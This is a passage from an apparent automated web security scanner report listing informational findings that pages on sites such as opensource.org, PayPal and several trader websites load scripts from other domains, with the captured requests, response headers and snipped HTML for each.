Set-Cookie: IBSD_LOCALE=en_US; Expires=Fri, 20 Jan 2012 05:04:09 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=2h8pqL-kKjohUfB_dlmEiD4; Expires=Thu, 24 Feb 2011 05:04:09 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=2h8pqL-kKjohUfB_dlmEiD4; Expires=Thu, 24 Feb 2011 05:04:09 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=2h8pqL-kKjohUfB_dlmEiD4; Expires=Thu, 24 Feb 2011 05:04:09 GMT; Path=/
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
Content-Length: 76566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html class="nojs" xmlns=
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.www.odcdn.com/N136538418/bundles/lib.js" ></script>

   
                                <script type="text/javascript" src="http://static.www.odcdn.com/1485153267/includes/customerservice.js" ></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://static.www.odcdn.com/1421577119/bundles/cm.js" ></script>
...[SNIP]...
</span>

   
                       <script type='text/javascript' src='//static.atgsvcs.com/js/atgsvcs.js'></script>
...[SNIP]...

21.1226. http://www.opensource.org/licenses/bsd-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/bsd-license.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /licenses/bsd-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=orttk62qs56op2so5ctlcpa9u7; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:01:58 GMT
ETag: "7de37e433f136f70754431d33998090d"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1227. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:02:12 GMT
ETag: "c78bed29e3c1e7584db2cae96691f4e3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1228. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:42 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=cqn9psagddni8r0cu6qcets3f0; expires=Thu, 17-Feb-2011 03:42:02 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:01:06 GMT
ETag: "ecf056aef437e96f0aaa9888d3f21414"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1229. http://www.ossp.org/pkg/tool/lmtp2nntp/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ossp.org
Path:   /pkg/tool/lmtp2nntp/

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /pkg/tool/lmtp2nntp/ HTTP/1.1
Host: www.ossp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:46 GMT
Server: Apache/2.2.8 (OpenPKG/CURRENT)
Last-Modified: Mon, 31 Mar 2008 22:42:38 GMT
ETag: "60600e-8281-449c35e657380"
Accept-Ranges: bytes
Content-Length: 33409
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="ICON" href="../../../SHARE/ossp_img/ossp-icon.ico">
<link rel="SHORTCUT ICON" href="../../../SHARE/ossp_img/o
...[SNIP]...
</script>
    <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1230. http://www.paperg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:04:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1231. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/soundings-publications-llc/2123/0.html

Issue detail

The response dynamically includes the following script from another domain:
  • https://ssl.google-analytics.com/urchin.js

Request

GET /flyerboard/soundings-publications-llc/2123/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:04:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4376
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1232. https://www.paperg.com/post.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • https://ssl.google-analytics.com/urchin.js

Request

GET /post.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:04:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
       
       
       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</div>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

21.1233. http://www.parenthood.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parenthood.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/11805/slf.js
  • http://edge.quantserve.com/quant.js
  • http://js.revsci.net/gateway/gw.js?csid=G07610&bpid=S024 4
  • http://www.assoc-amazon.com/s/ads.js

Request

GET / HTTP/1.1
Host: www.parenthood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2bb2r6pp17500tshvuo5ak5ap5; path=/
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 106355


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta htt
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.assoc-amazon.com/s/ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.assoc-amazon.com/s/ads.js"></script>
...[SNIP]...
<!-- End SiteCatalyst code version: H.15.1. -->
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=G07610&bpid=S024 4"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/11805/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1234. http://www.passagemaker.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.passagemaker.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.passagemaker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:08:52 GMT
Server: Microsoft-IIS/6.0
X-PassageMaker-Magazine: Be The Experience
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=VdID47XyywEkAAAAZTk0ZDgxOGUtNjY3My00Y2Y2LWI2ZWUtOGFhNDU4MjU4NzE10; expires=Mon, 04-Apr-2011 10:48:52 GMT; path=/; HttpOnly
Set-Cookie: DotNetNukeAnonymous=b419cc6e-ab08-4675-861d-502e04e1f67a; expires=Tue, 25-Jan-2011 00:28:52 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=cf5pyhzi5qrgsz55vgndi245; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 64784

<!--[if IE]><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head id="Head">
<!--************************************************
...[SNIP]...
</table>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1235. https://www.paypal.com/cgi-bin/webscr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The response dynamically includes the following scripts from other domains:
  • https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/iconix.js
  • https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/lib/min/global.js
  • https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/lib/min/widgets.js
  • https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/opinionlab/oo_engine.js
  • https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/pageBlockingUnsafeBrowsers.js
  • https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/pp_naturalsearch.js
  • https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/site_catalyst/pp_jscode_080706.js
  • https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/tns/mid.js
  • https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:56 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=HjCqYFc5CXevJqotkFvMFXXfoIhvN4EW-tKQaiEr8amgJtib0LN-pmWtmu8m4ykzPAW2XZqlpMiPKRHK4wvHNGkR63CpLZRW66OIADyLhqUeCW3OJL35JwPuquu9XtupCaGbkm%7c7MTs5u44SsQwlwsvfYBCh-eN7c-WopQW6ARNbpWah9zCNwXi7WheWGQ_fSWzNJZRd5Af5W%7cqZnpbU6jjFBhsFea-10nNBdj15bLnQiVDM35QkeV0xMIv34GNGCo06XR8iUJDMZcLQxoK0%7c1295914136; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=DG0txL-D_ExP4tRfsCqsa40Ft5wDbFyjquJlxwVRFta791T3X2o2_RMTFJrbEaIkf1tYt_faGHrn0XU5; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d7%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.190.8.167.1295914136420337; path=/; expires=Thu, 17-Jan-41 00:08:56 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!--

...[SNIP]...
</style>
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/tns/mid.js"></script>
...[SNIP]...
<!-- OnlineOpinionF3cS v3.0-->
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/pp_naturalsearch.js"></script>
...[SNIP]...
<!-- SiteCatalyst Code
Copyright 1997-2005 Omniture, Inc.
More info available at http://www.omniture.com -->
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

21.1236. http://www.playshakespeare.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playshakespeare.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180908

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns=
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1237. http://www.pwc-traderonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pwc-traderonline.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:08:58 GMT
Connection: close
Content-Type: text/html
Content-Length: 43482

<!-- dstolweb06-php5a --><!DOCTYPE html>
<html>
<head>
   <title>PWCs for Sale - Jet Ski, Sea Doo, Wave Runner and other Personal Watercraft - PWC-Traderonline.com</title>
   <meta http-equiv="Cache-Contr
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1238. http://www.pwc-traderonline.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pwc-traderonline.com
Path:   /research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:00 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 21995


<!-- dstolweb04-php5a -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Personal Watercraft Resources: Finance, Insurance, Transport and More - PWC-Tra
...[SNIP]...
en" type="text/css" href="/css/pwc-css.php?pageName=resources" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1239. http://www.pwc-traderonline.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pwc-traderonline.com
Path:   /sell/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:59 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26574


<!-- dstolweb05-php5a -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sell Your New or Used Personal Watercraft - PWC-TraderOnline.com</title>

...[SNIP]...
"screen" type="text/css" href="/css/pwc-css.php?pageName=sell" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1240. http://www.roomsaver.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.roomsaver.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cf.kampyle.com/k_button.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://www.ispeakvideo.com/scripts/iSpeakVideo.js

Request

GET / HTTP/1.1
Host: www.roomsaver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 00:09:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=8tjbv0o18kobn9bckebm33vd32; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" x
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=roomsaver"></script>
...[SNIP]...
</script>
<script src="http://www.ispeakvideo.com/scripts/iSpeakVideo.js"
type="text/javascript" language="javascript" >
</script>
...[SNIP]...
</div>
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...

21.1241. http://www.rvtraderonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rvtraderonline.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.rvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:08 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:09:09 GMT
Connection: close
Content-Type: text/html
Content-Length: 87669

<!-- dstolweb10-php5b --><!DOCTYPE html>
<html>
<head>
   <title>RV Trader.. - RVs - Fleetwood, Airstream, Winnebago, Keystone, Forest River, Newmar RVs and More - RVTrader.com</title>
   <meta http-equiv
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1242. http://www.rvtraderonline.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rvtraderonline.com
Path:   /research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.rvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:15 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 23240


<!-- dstolweb07-php5b -->

